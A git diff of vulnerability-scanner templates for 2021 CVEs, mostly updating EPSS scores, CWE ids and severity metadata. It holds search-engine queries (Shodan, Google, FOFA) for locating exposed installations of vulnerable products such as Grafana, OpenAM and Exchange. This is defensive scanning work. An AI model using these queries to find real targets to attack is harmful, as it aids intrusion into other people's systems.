@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-27320
cwe-id: CWE-89
- epss-score: 0.20333
+ epss-score: 0.14008
cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.94957
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml
index 1bb122836b..a4ca85685e 100644
--- a/http/cves/2021/CVE-2021-27330.yaml
+++ b/http/cves/2021/CVE-2021-27330.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-27330
cwe-id: CWE-79
- epss-score: 0.00218
+ epss-score: 0.0031
cpe: cpe:2.3:a:triconsole:datepicker_calendar:*:*:*:*:*:*:*:*
+ epss-percentile: 0.66185
metadata:
max-request: 1
google-query: intitle:TriConsole.com - PHP Calendar Date Picker
diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml
index 843caf096b..3384d2d389 100644
--- a/http/cves/2021/CVE-2021-27358.yaml
+++ b/http/cves/2021/CVE-2021-27358.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-306
epss-score: 0.02345
cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
+ epss-percentile: 0.88377
metadata:
max-request: 1
shodan-query: title:"Grafana"
diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml
index aef63442cf..190232da88 100644
--- a/http/cves/2021/CVE-2021-27519.yaml
+++ b/http/cves/2021/CVE-2021-27519.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00189
cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.55657
metadata:
max-request: 1
shodan-query: 'http.html:"Powered by: FUDforum"'
diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml
index e35c6414be..e54420d87f 100644
--- a/http/cves/2021/CVE-2021-27520.yaml
+++ b/http/cves/2021/CVE-2021-27520.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00189
cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.55657
metadata:
max-request: 2
shodan-query: html:"FUDforum"
diff --git a/http/cves/2021/CVE-2021-27561.yaml b/http/cves/2021/CVE-2021-27561.yaml
index 5350cba86a..27e9c5934c 100644
--- a/http/cves/2021/CVE-2021-27561.yaml
+++ b/http/cves/2021/CVE-2021-27561.yaml
@@ -13,9 +13,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-27561
- cwe-id: CWE-918
- epss-score: 0.97477
+ cwe-id: CWE-78
+ epss-score: 0.97493
cpe: cpe:2.3:a:yealink:device_management:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99958
metadata:
max-request: 1
vendor: yealink
diff --git a/http/cves/2021/CVE-2021-27651.yaml b/http/cves/2021/CVE-2021-27651.yaml
index 81ff8dd51b..8d306bcf1b 100644
--- a/http/cves/2021/CVE-2021-27651.yaml
+++ b/http/cves/2021/CVE-2021-27651.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-27651
cwe-id: CWE-287
- epss-score: 0.02303
+ epss-score: 0.03154
cpe: cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:*
+ epss-percentile: 0.89839
metadata:
max-request: 1
vendor: pega
diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml
index fc1c5b4846..1ef2410224 100644
--- a/http/cves/2021/CVE-2021-27670.yaml
+++ b/http/cves/2021/CVE-2021-27670.yaml
@@ -3,17 +3,25 @@ id: CVE-2021-27670
info:
name: Appspace 6.2.4 - Server-Side Request Forgery
author: ritikchaddha
- severity: high
+ severity: critical
description: Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter.
reference:
- https://github.com/h3110mb/PoCSSrfApp
- https://nvd.nist.gov/vuln/detail/CVE-2021-27670
classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
cve-id: CVE-2021-27670
+ cwe-id: CWE-918
+ epss-score: 0.32169
+ cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:*
+ epss-percentile: 0.96438
metadata:
max-request: 1
verified: true
shodan-query: title:"Appspace"
+ vendor: appspace
+ product: appspace
tags: cve,cve2023,appspace,ssrf
http:
diff --git a/http/cves/2021/CVE-2021-27748.yaml b/http/cves/2021/CVE-2021-27748.yaml
index cdad826ad0..8890bb10b6 100644
--- a/http/cves/2021/CVE-2021-27748.yaml
+++ b/http/cves/2021/CVE-2021-27748.yaml
@@ -27,6 +27,7 @@ http:
host-redirects: true
max-redirects: 2
stop-at-first-match: true
+
matchers-condition: and
matchers:
- type: word
diff --git a/http/cves/2021/CVE-2021-27850.yaml b/http/cves/2021/CVE-2021-27850.yaml
index 9f79238f05..e0da3906cf 100644
--- a/http/cves/2021/CVE-2021-27850.yaml
+++ b/http/cves/2021/CVE-2021-27850.yaml
@@ -15,9 +15,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-27850
- cwe-id: CWE-200,CWE-502
- epss-score: 0.97413
+ cwe-id: CWE-502,CWE-200
+ epss-score: 0.97402
cpe: cpe:2.3:a:apache:tapestry:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99878
metadata:
max-request: 2
vendor: apache
diff --git a/http/cves/2021/CVE-2021-27905.yaml b/http/cves/2021/CVE-2021-27905.yaml
index 42910c793e..64d696797a 100644
--- a/http/cves/2021/CVE-2021-27905.yaml
+++ b/http/cves/2021/CVE-2021-27905.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-918
epss-score: 0.9728
cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99779
metadata:
max-request: 2
vendor: apache
diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml
index 83ec27c70a..8a924d825a 100644
--- a/http/cves/2021/CVE-2021-27909.yaml
+++ b/http/cves/2021/CVE-2021-27909.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00094
cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:*
+ epss-percentile: 0.38928
metadata:
max-request: 1
shodan-query: title:"Mautic"
diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml
index db5f54a64f..ece4b06420 100644
--- a/http/cves/2021/CVE-2021-27931.yaml
+++ b/http/cves/2021/CVE-2021-27931.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 9.1
cve-id: CVE-2021-27931
cwe-id: CWE-611
- epss-score: 0.7051
+ epss-score: 0.68126
cpe: cpe:2.3:a:lumis:lumis_experience_platform:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9753
metadata:
max-request: 1
vendor: lumis
diff --git a/http/cves/2021/CVE-2021-28073.yaml b/http/cves/2021/CVE-2021-28073.yaml
index b937929ab7..e932efbbcd 100644
--- a/http/cves/2021/CVE-2021-28073.yaml
+++ b/http/cves/2021/CVE-2021-28073.yaml
@@ -9,12 +9,12 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-27573
- http://noahblog.360.cn/ntopng-multiple-vulnerabilities/
- https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md
+ remediation: Upgrade to version 4.3 or later.
classification:
cve-id: CVE-2021-28073
- remediation: Upgrade to version 4.3 or later.
- tags: ntopng,cve,cve2021
metadata:
max-request: 2
+ tags: ntopng,cve,cve2021
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-28149.yaml b/http/cves/2021/CVE-2021-28149.yaml
index ba59ae2d97..cd6585893c 100644
--- a/http/cves/2021/CVE-2021-28149.yaml
+++ b/http/cves/2021/CVE-2021-28149.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2021-28149
cwe-id: CWE-22
- epss-score: 0.05232
+ epss-score: 0.06892
cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:*
+ epss-percentile: 0.93035
metadata:
max-request: 2
vendor: hongdian
diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml
index 9c4bcb7ee8..471cad4428 100644
--- a/http/cves/2021/CVE-2021-28150.yaml
+++ b/http/cves/2021/CVE-2021-28150.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-425
epss-score: 0.00339
cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:*
+ epss-percentile: 0.67725
metadata:
max-request: 2
vendor: hongdian
diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml
index ca476e91fa..5329180d03 100644
--- a/http/cves/2021/CVE-2021-28151.yaml
+++ b/http/cves/2021/CVE-2021-28151.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-78
epss-score: 0.97079
cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:*
+ epss-percentile: 0.99662
metadata:
max-request: 2
vendor: hongdian
diff --git a/http/cves/2021/CVE-2021-28164.yaml b/http/cves/2021/CVE-2021-28164.yaml
index f93353702f..536c5026ac 100644
--- a/http/cves/2021/CVE-2021-28164.yaml
+++ b/http/cves/2021/CVE-2021-28164.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-200
epss-score: 0.02064
cpe: cpe:2.3:a:eclipse:jetty:9.4.37:20210219:*:*:*:*:*:*
+ epss-percentile: 0.87606
metadata:
max-request: 1
vendor: eclipse
diff --git a/http/cves/2021/CVE-2021-28169.yaml b/http/cves/2021/CVE-2021-28169.yaml
index 63601fb12d..fcded57edf 100644
--- a/http/cves/2021/CVE-2021-28169.yaml
+++ b/http/cves/2021/CVE-2021-28169.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-200
epss-score: 0.00116
cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*
+ epss-percentile: 0.44634
metadata:
max-request: 2
vendor: eclipse
diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml
index 1de8b242fc..01003f16c7 100644
--- a/http/cves/2021/CVE-2021-28377.yaml
+++ b/http/cves/2021/CVE-2021-28377.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2021-28377
cwe-id: CWE-22
- epss-score: 0.00118
+ epss-score: 0.00158
cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:*
+ epss-percentile: 0.51652
metadata:
max-request: 1
framework: joomla
diff --git a/http/cves/2021/CVE-2021-28419.yaml b/http/cves/2021/CVE-2021-28419.yaml
index b7b278201f..da36124cd0 100644
--- a/http/cves/2021/CVE-2021-28419.yaml
+++ b/http/cves/2021/CVE-2021-28419.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2021-28419
cwe-id: CWE-89
- epss-score: 0.13147
+ epss-score: 0.17236
cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*
+ epss-percentile: 0.9541
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2021/CVE-2021-28854.yaml b/http/cves/2021/CVE-2021-28854.yaml
index a0182a6c07..81eb44895a 100644
--- a/http/cves/2021/CVE-2021-28854.yaml
+++ b/http/cves/2021/CVE-2021-28854.yaml
@@ -4,16 +4,14 @@ info:
name: VICIdial Sensitive Information Disclosure
author: pdteam
severity: high
- description: VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug
- information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial
- systems.
+ description: VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems.
reference:
- https://github.com/JHHAX/VICIdial
classification:
cve-id: CVE-2021-28854
- tags: cve,cve2021
metadata:
max-request: 1
+ tags: cve,cve2021
http:
- method: GET
diff --git a/http/cves/2021/CVE-2021-28918.yaml b/http/cves/2021/CVE-2021-28918.yaml
index 2361230711..51eadd2fad 100644
--- a/http/cves/2021/CVE-2021-28918.yaml
+++ b/http/cves/2021/CVE-2021-28918.yaml
@@ -15,9 +15,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2021-28918
- cwe-id: CWE-20
- epss-score: 0.02589
+ cwe-id: CWE-704
+ epss-score: 0.02788
cpe: cpe:2.3:a:netmask_project:netmask:*:*:*:*:*:node.js:*:*
+ epss-percentile: 0.89291
metadata:
max-request: 3
framework: node.js
diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml
index 31a4b2c3d5..e5fca40e4d 100644
--- a/http/cves/2021/CVE-2021-28937.yaml
+++ b/http/cves/2021/CVE-2021-28937.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-312
epss-score: 0.03352
cpe: cpe:2.3:o:acexy:wireless-n_wifi_repeater_firmware:28.08.06.1:*:*:*:*:*:*:*
+ epss-percentile: 0.90136
metadata:
max-request: 1
vendor: acexy
diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml
index 76778c67d6..d4751526b9 100644
--- a/http/cves/2021/CVE-2021-29156.yaml
+++ b/http/cves/2021/CVE-2021-29156.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-29156
cwe-id: CWE-74
- epss-score: 0.35656
+ epss-score: 0.42881
cpe: cpe:2.3:a:forgerock:openam:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96852
metadata:
max-request: 3
shodan-query: http.title:"OpenAM"
diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml
index a3641d095b..43e4d8f329 100644
--- a/http/cves/2021/CVE-2021-29203.yaml
+++ b/http/cves/2021/CVE-2021-29203.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-29203
cwe-id: CWE-306
- epss-score: 0.9596
+ epss-score: 0.95703
cpe: cpe:2.3:a:hp:edgeline_infrastructure_manager:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99168
metadata:
max-request: 2
vendor: hp
diff --git a/http/cves/2021/CVE-2021-29441.yaml b/http/cves/2021/CVE-2021-29441.yaml
index 1ee4449140..45a9886f0b 100644
--- a/http/cves/2021/CVE-2021-29441.yaml
+++ b/http/cves/2021/CVE-2021-29441.yaml
@@ -22,8 +22,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-29441
cwe-id: CWE-290
- epss-score: 0.96642
+ epss-score: 0.96644
cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9947
metadata:
max-request: 2
vendor: alibaba
diff --git a/http/cves/2021/CVE-2021-29442.yaml b/http/cves/2021/CVE-2021-29442.yaml
index fb3a1b0088..356fccffdb 100644
--- a/http/cves/2021/CVE-2021-29442.yaml
+++ b/http/cves/2021/CVE-2021-29442.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-29442
cwe-id: CWE-306
- epss-score: 0.96984
+ epss-score: 0.96994
cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99621
metadata:
max-request: 1
vendor: alibaba
diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml
index 35f99aec52..3b607c24b7 100644
--- a/http/cves/2021/CVE-2021-29484.yaml
+++ b/http/cves/2021/CVE-2021-29484.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.01083
cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*
+ epss-percentile: 0.82494
metadata:
max-request: 1
framework: node.js
diff --git a/http/cves/2021/CVE-2021-29490.yaml b/http/cves/2021/CVE-2021-29490.yaml
index b1b1c9c4df..2e915c7c1c 100644
--- a/http/cves/2021/CVE-2021-29490.yaml
+++ b/http/cves/2021/CVE-2021-29490.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-918
epss-score: 0.00137
cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.48378
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2021/CVE-2021-29505.yaml b/http/cves/2021/CVE-2021-29505.yaml
index f395159d98..6013202ad2 100644
--- a/http/cves/2021/CVE-2021-29505.yaml
+++ b/http/cves/2021/CVE-2021-29505.yaml
@@ -20,6 +20,7 @@ info:
cwe-id: CWE-502
epss-score: 0.02373
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
+ epss-percentile: 0.88448
metadata:
max-request: 1
vendor: xstream_project
diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml
index 356e9b5b18..f20a058c91 100644
--- a/http/cves/2021/CVE-2021-29622.yaml
+++ b/http/cves/2021/CVE-2021-29622.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00225
cpe: cpe:2.3:a:prometheus:prometheus:*:*:*:*:*:*:*:*
+ epss-percentile: 0.60091
metadata:
max-request: 1
vendor: prometheus
diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml
index 6d5f0c629a..7e629c1fc7 100644
--- a/http/cves/2021/CVE-2021-29625.yaml
+++ b/http/cves/2021/CVE-2021-29625.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00212
cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:*
+ epss-percentile: 0.58458
metadata:
max-request: 1
vendor: adminer
diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml
index 45fcf69abf..0d12e71690 100644
--- a/http/cves/2021/CVE-2021-3002.yaml
+++ b/http/cves/2021/CVE-2021-3002.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00135
cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*
+ epss-percentile: 0.47974
metadata:
max-request: 1
vendor: "seopanel"
diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml
index 000f3830f0..a4773ca8a4 100644
--- a/http/cves/2021/CVE-2021-30049.yaml
+++ b/http/cves/2021/CVE-2021-30049.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00102
cpe: cpe:2.3:a:sysaid:sysaid:20.3.64:b14:*:*:*:*:*:*
+ epss-percentile: 0.40864
metadata:
max-request: 1
vendor: sysaid
diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml
index ef48497b66..71b7330908 100644
--- a/http/cves/2021/CVE-2021-30128.yaml
+++ b/http/cves/2021/CVE-2021-30128.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-30128
cwe-id: CWE-502
- epss-score: 0.19248
+ epss-score: 0.18312
cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95512
metadata:
max-request: 1
fofa-query: app="Apache_OFBiz"
diff --git a/http/cves/2021/CVE-2021-30134.yaml b/http/cves/2021/CVE-2021-30134.yaml
index d26bcea0c4..f731e55e9b 100644
--- a/http/cves/2021/CVE-2021-30134.yaml
+++ b/http/cves/2021/CVE-2021-30134.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2021-30134
cwe-id: CWE-79
- epss-score: 0.00064
+ epss-score: 0.00071
cpe: cpe:2.3:a:php_curl_class_project:php_curl_class:*:*:*:*:*:*:*:*
+ epss-percentile: 0.29012
metadata:
max-request: 1
google-query: inurl:"/php-curl-test/post_file_path_upload.php"
diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml
index b04427f75a..d50aff8b47 100644
--- a/http/cves/2021/CVE-2021-30151.yaml
+++ b/http/cves/2021/CVE-2021-30151.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00435
cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:*
+ epss-percentile: 0.71462
metadata:
max-request: 1
vendor: contribsys
diff --git a/http/cves/2021/CVE-2021-3017.yaml b/http/cves/2021/CVE-2021-3017.yaml
index 081c71cbff..ccf6a4bc50 100644
--- a/http/cves/2021/CVE-2021-3017.yaml
+++ b/http/cves/2021/CVE-2021-3017.yaml
@@ -14,6 +14,7 @@ info:
cve-id: CVE-2021-3017
epss-score: 0.0151
cpe: cpe:2.3:o:intelbras:win_300_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.85325
metadata:
max-request: 1
vendor: intelbras
diff --git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml
index 2d4ee8432d..acbcb8e0db 100644
--- a/http/cves/2021/CVE-2021-30175.yaml
+++ b/http/cves/2021/CVE-2021-30175.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-89
epss-score: 0.03345
cpe: cpe:2.3:a:zerof:web_server:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.9012
metadata:
max-request: 1
vendor: zerof
diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml
index e3a89b5bf9..9221ef6bb4 100644
--- a/http/cves/2021/CVE-2021-3019.yaml
+++ b/http/cves/2021/CVE-2021-3019.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-3019
cwe-id: CWE-22
- epss-score: 0.01187
+ epss-score: 0.01151
cpe: cpe:2.3:a:lanproxy_project:lanproxy:0.1:*:*:*:*:*:*:*
+ epss-percentile: 0.83025
metadata:
max-request: 1
vendor: lanproxy_project
diff --git a/http/cves/2021/CVE-2021-30213.yaml b/http/cves/2021/CVE-2021-30213.yaml
index 4b14a8d203..61b3823c5b 100644
--- a/http/cves/2021/CVE-2021-30213.yaml
+++ b/http/cves/2021/CVE-2021-30213.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.001
cpe: cpe:2.3:a:eng:knowage:7.3.0:*:*:*:*:*:*:*
+ epss-percentile: 0.40466
metadata:
max-request: 1
vendor: eng
diff --git a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml
index 4aff498f8e..bb8f18d7e3 100644
--- a/http/cves/2021/CVE-2021-30461.yaml
+++ b/http/cves/2021/CVE-2021-30461.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-30461
cwe-id: CWE-94
- epss-score: 0.9675
+ epss-score: 0.96767
cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99521
metadata:
max-request: 1
shodan-query: http.title:"VoIPmonitor"
diff --git a/http/cves/2021/CVE-2021-30497.yaml b/http/cves/2021/CVE-2021-30497.yaml
index 47022a7d7e..8f0c78626a 100644
--- a/http/cves/2021/CVE-2021-30497.yaml
+++ b/http/cves/2021/CVE-2021-30497.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.96366
cpe: cpe:2.3:a:ivanti:avalanche:6.3.2:*:*:*:*:windows:*:*
+ epss-percentile: 0.99355
metadata:
max-request: 1
framework: windows
diff --git a/http/cves/2021/CVE-2021-3110.yaml b/http/cves/2021/CVE-2021-3110.yaml
index 5cb7d576eb..15ea343ebc 100644
--- a/http/cves/2021/CVE-2021-3110.yaml
+++ b/http/cves/2021/CVE-2021-3110.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-3110
cwe-id: CWE-89
- epss-score: 0.95326
+ epss-score: 0.95398
cpe: cpe:2.3:a:prestashop:prestashop:1.7.7.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99094
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2021/CVE-2021-31195.yaml b/http/cves/2021/CVE-2021-31195.yaml
index 21cae88c6b..d5ae4e0b82 100644
--- a/http/cves/2021/CVE-2021-31195.yaml
+++ b/http/cves/2021/CVE-2021-31195.yaml
@@ -3,7 +3,7 @@ id: CVE-2021-31195
info:
name: Microsoft Exchange Server - Cross-Site Scripting
author: infosecsanyam
- severity: high
+ severity: medium
description: Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp.
reference:
- https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html
@@ -11,12 +11,13 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-31195
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31195
classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
- cvss-score: 8.8
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
cve-id: CVE-2021-31195
cwe-id: CWE-79
- epss-score: 0.96
+ epss-score: 0.94276
cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*
+ epss-percentile: 0.98858
metadata:
max-request: 1
shodan-query: http.title:"Outlook"
diff --git a/http/cves/2021/CVE-2021-31249.yaml b/http/cves/2021/CVE-2021-31249.yaml
index 18d1460cb1..0040436a43 100644
--- a/http/cves/2021/CVE-2021-31249.yaml
+++ b/http/cves/2021/CVE-2021-31249.yaml
@@ -14,8 +14,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2021-31249
- epss-score: 0.0042
+ cwe-id: CWE-74
+ epss-score: 0.00331
cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.67395
metadata:
max-request: 1
vendor: chiyu-tech
diff --git a/http/cves/2021/CVE-2021-31250.yaml b/http/cves/2021/CVE-2021-31250.yaml
index 7d028abc95..702e6dc450 100644
--- a/http/cves/2021/CVE-2021-31250.yaml
+++ b/http/cves/2021/CVE-2021-31250.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.97079
cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.99662
metadata:
max-request: 1
vendor: chiyu-tech
diff --git a/http/cves/2021/CVE-2021-3129.yaml b/http/cves/2021/CVE-2021-3129.yaml
index c7ff2e8ec7..76857ad1ad 100644
--- a/http/cves/2021/CVE-2021-3129.yaml
+++ b/http/cves/2021/CVE-2021-3129.yaml
@@ -14,8 +14,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-3129
- epss-score: 0.97465
+ epss-score: 0.97515
cpe: cpe:2.3:a:facade:ignition:*:*:*:*:*:laravel:*:*
+ epss-percentile: 0.99973
metadata:
max-request: 6
framework: laravel
diff --git a/http/cves/2021/CVE-2021-31537.yaml b/http/cves/2021/CVE-2021-31537.yaml
index 8725161fbe..2e44115220 100644
--- a/http/cves/2021/CVE-2021-31537.yaml
+++ b/http/cves/2021/CVE-2021-31537.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00271
cpe: cpe:2.3:a:sisinformatik:sis-rewe_go:*:*:*:*:*:*:*:*
+ epss-percentile: 0.63726
metadata:
max-request: 1
vendor: sisinformatik
diff --git a/http/cves/2021/CVE-2021-31581.yaml b/http/cves/2021/CVE-2021-31581.yaml
index 70ba023b4c..b5ec1abb7b 100644
--- a/http/cves/2021/CVE-2021-31581.yaml
+++ b/http/cves/2021/CVE-2021-31581.yaml
@@ -14,9 +14,10 @@ info:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
cvss-score: 4.4
cve-id: CVE-2021-31581
- cwe-id: CWE-312,CWE-269
+ cwe-id: CWE-269,CWE-312
epss-score: 0.00285
cpe: cpe:2.3:a:akkadianlabs:ova_appliance:*:*:*:*:*:*:*:*
